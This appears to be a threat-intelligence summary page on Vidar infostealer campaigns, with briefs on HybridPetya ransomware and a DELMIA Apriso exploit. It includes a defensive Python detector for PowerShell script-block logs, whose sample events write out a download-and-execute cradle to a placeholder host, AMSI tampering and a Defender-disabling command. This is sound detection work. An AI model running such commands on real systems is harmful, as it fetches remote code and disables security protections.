Evolved Vidar Infostealer Campaigns Target Windows Environments

📰 1 unique source, 1 article

Summary


The Vidar infostealer, first tracked in late 2018, has evolved with new obfuscation techniques and enhanced stealth capabilities. This malware-as-a-service targets Windows environments, stealing credentials, financial data, and other sensitive information. It spreads through social engineering, malicious websites, and malvertising campaigns. The latest iteration uses encrypted command-and-control (C2) channels, Living-off-the-Land Binaries (LOLBins), and covert exfiltration methods to evade detection. The malware employs PowerShell scripts for stealthy payload retrieval, disguises traffic as legitimate PowerShell activity, and uses exponential backoff with jitter to avoid detection. It also attempts to bypass Windows Defender and Antimalware Scan Interface (AMSI) to maintain persistence and evade defenses. The C2 server used for data exfiltration is TLS-encrypted.
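The summary above names the behaviours a defender can look for in PowerShell script-block logging: download cradles used for payload retrieval, encoded commands, and tampering with AMSI or Defender. The script below is an added example, not code from the original report and not derived from any Vidar sample; it parses constructed script-block log lines (in a flat-text shape modelled loosely on Event ID 4104 exports, an assumption), scores each block against a small indicator list, and returns the blocks worth triaging. The host names, timestamps, script blocks, indicator patterns and weights are all constructed for illustration.

```python
import re
from dataclasses import dataclass, field

# Constructed sample lines in a flat-text shape modelled on exported
# PowerShell script-block events (Event ID 4104). None of these are real
# Vidar artefacts; they only exercise the detector.
SAMPLE_EVENTS = [
    "2025-09-11 19:23:01 EventID=4104 Host=WS01 ScriptBlock=Get-ChildItem C:\\Users\\alice\\Documents",
    "2025-09-11 19:23:07 EventID=4104 Host=WS01 ScriptBlock=IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/p.ps1')",
    "2025-09-11 19:23:09 EventID=4104 Host=WS01 ScriptBlock=$a=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')",
    "2025-09-11 19:23:15 EventID=4104 Host=WS02 ScriptBlock=Set-MpPreference -DisableRealtimeMonitoring $true",
    "2025-09-11 19:23:20 EventID=4104 Host=WS02 ScriptBlock=powershell -nop -w hidden -EncodedCommand SQBFAFgA",
    "2025-09-11 19:24:00 EventID=4104 Host=WS03 ScriptBlock=Get-Service | Where-Object Status -eq Running",
]

# Indicator list: (name, pattern, weight). Weights are an assumption chosen
# for this example; tune them against your own baseline of benign activity.
INDICATORS = [
    ("download_cradle", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I), 3),
    ("invoke_expression", re.compile(r"\b(IEX|Invoke-Expression)\b", re.I), 2),
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}", re.I), 3),
    ("base64_decode", re.compile(r"FromBase64String", re.I), 2),
    ("amsi_tamper", re.compile(r"AmsiUtils|amsiInitFailed|AmsiScanBuffer", re.I), 5),
    ("defender_tamper", re.compile(r"Set-MpPreference\s+-Disable\w+|Add-MpPreference\s+-ExclusionPath", re.I), 5),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I), 1),
]

# Flat-text line layout assumed by this example (constructed, not a vendor format).
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) EventID=(?P<eid>\d+) Host=(?P<host>\S+) ScriptBlock=(?P<sb>.*)$"
)


@dataclass
class Finding:
    timestamp: str
    host: str
    score: int
    indicators: list = field(default_factory=list)
    script_block: str = ""


def parse_event(line):
    """Return the fields of a script-block event, or None for anything else."""
    m = LINE_RE.match(line)
    if not m or m.group("eid") != "4104":
        return None
    return m.groupdict()


def score_script_block(text):
    """Return (score, [indicator names]) for one script block."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits


def triage(lines, threshold=3):
    """Score every 4104 event and return findings at or above the threshold,
    highest score first (stable sort keeps log order among equal scores)."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        score, hits = score_script_block(ev["sb"])
        if score >= threshold:
            findings.append(Finding(ev["ts"], ev["host"], score, hits, ev["sb"]))
    return sorted(findings, key=lambda f: f.score, reverse=True)


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.timestamp} {f.host} score={f.score} {','.join(f.indicators)}")
        print(f"    {f.script_block[:100]}")
```

The point of weighting rather than matching single strings is that a download cradle on its own is common in administrative scripting, whereas a cradle combined with Invoke-Expression, or any reference to AMSI internals or Defender preference changes, is rarely benign on a workstation; the threshold lets you keep the noisy low-weight indicators as context without paging on them alone. Script-block logging must be enabled for these events to exist at all, and a block that only references AMSI types does not itself prove a bypass succeeded, so treat a hit as a triage lead rather than a verdict.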

Timeline

  1. 11.09.2025 19:23 📰 1 article

    Vidar Infostealer Campaigns Evolve with Enhanced Stealth and Persistence

    The Vidar infostealer has evolved with new obfuscation techniques and enhanced stealth capabilities. The latest iteration uses encrypted command-and-control (C2) channels, Living-off-the-Land Binaries (LOLBins), and covert exfiltration methods. The malware employs PowerShell scripts for stealthy payload retrieval and attempts to bypass Windows Defender and Antimalware Scan Interface (AMSI) to maintain persistence. The C2 server used for data exfiltration is TLS-encrypted. The malware spreads through social engineering, malicious websites, and malvertising campaigns, targeting Windows environments to steal sensitive information.


Information Snippets

  • Vidar infostealer is a malware-as-a-service that targets Windows environments.

    First reported: 11.09.2025 19:23
    📰 1 source, 1 article
  • The malware steals credentials, operating system details, cookies, financial data, and authentication tokens.

    First reported: 11.09.2025 19:23
    📰 1 source, 1 article
  • Vidar spreads through social engineering, malicious websites, and malvertising campaigns.

    First reported: 11.09.2025 19:23
    📰 1 source, 1 article
  • The latest iteration uses encrypted C2 channels, LOLBins, and covert exfiltration methods.

    First reported: 11.09.2025 19:23
    📰 1 source, 1 article
  • The malware employs PowerShell scripts for stealthy payload retrieval and evasion techniques.

    First reported: 11.09.2025 19:23
    📰 1 source, 1 article
  • Vidar attempts to bypass Windows Defender and AMSI to maintain persistence.

    First reported: 11.09.2025 19:23
    📰 1 source, 1 article
  • The C2 server used for data exfiltration is TLS-encrypted.

    First reported: 11.09.2025 19:23
    📰 1 source, 1 article

Similar Happenings

HybridPetya Ransomware Bypasses UEFI Secure Boot via CVE-2024-7344

A new ransomware strain, HybridPetya, has been discovered. It resembles the Petya/NotPetya malware and can bypass UEFI Secure Boot using the CVE-2024-7344 vulnerability. HybridPetya encrypts the Master File Table (MFT) on NTFS-formatted partitions and installs a malicious EFI application on the EFI System Partition. The ransomware has two main components: a bootkit and an installer. The bootkit handles encryption and decryption processes, displaying fake CHKDSK messages to deceive victims. The ransom note demands $1,000 in Bitcoin, with a wallet receiving $183.32 between February and May 2025. HybridPetya exploits a remote code execution vulnerability in the Howyar Reloader UEFI application, allowing it to bypass Secure Boot. The variant uses a specially crafted file named 'cloak.dat' to load the bootkit binary. Microsoft revoked the vulnerable binary in January 2025. ESET's telemetry data indicates no evidence of HybridPetya being used in the wild, suggesting it may be a proof-of-concept (PoC). The ransomware incorporates characteristics from both Petya and NotPetya, including the visual style and attack chain. It drops several files into the EFI System Partition, including configuration, validation, and encryption progress tracking files. The ransom note provides a 32-character key for decryption and system restoration upon payment. Indicators of compromise for HybridPetya are available on a GitHub repository. Microsoft fixed CVE-2024-7344 with the January 2025 Patch Tuesday updates.

CVE-2025-5086 in DELMIA Apriso Exploited in the Wild

A critical deserialization vulnerability (CVE-2025-5086) in Dassault Systèmes DELMIA Apriso Manufacturing Operations Management (MOM) software is being actively exploited. The flaw, with a CVSS score of 9.0, affects versions from Release 2020 through Release 2025. The vulnerability allows for remote code execution, and exploitation attempts have been observed originating from an IP address in Mexico. The attacks involve sending a malicious HTTP request with a Base64-encoded payload. The payload decodes to a Windows executable identified as "Trojan.MSIL.Zapchast.gen," a spyware capable of capturing user activities and sending collected information to attackers. DELMIA Apriso is used in production processes for digitalizing and monitoring, including scheduling production, quality management, resource allocation, warehouse management, and integration between production equipment and business applications. The flaw impacts critical industries such as automotive, aerospace, electronics, high-tech, and industrial machinery. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to the Known Exploited Vulnerabilities (KEV) catalog and is advising federal agencies to apply necessary updates by October 2, 2025.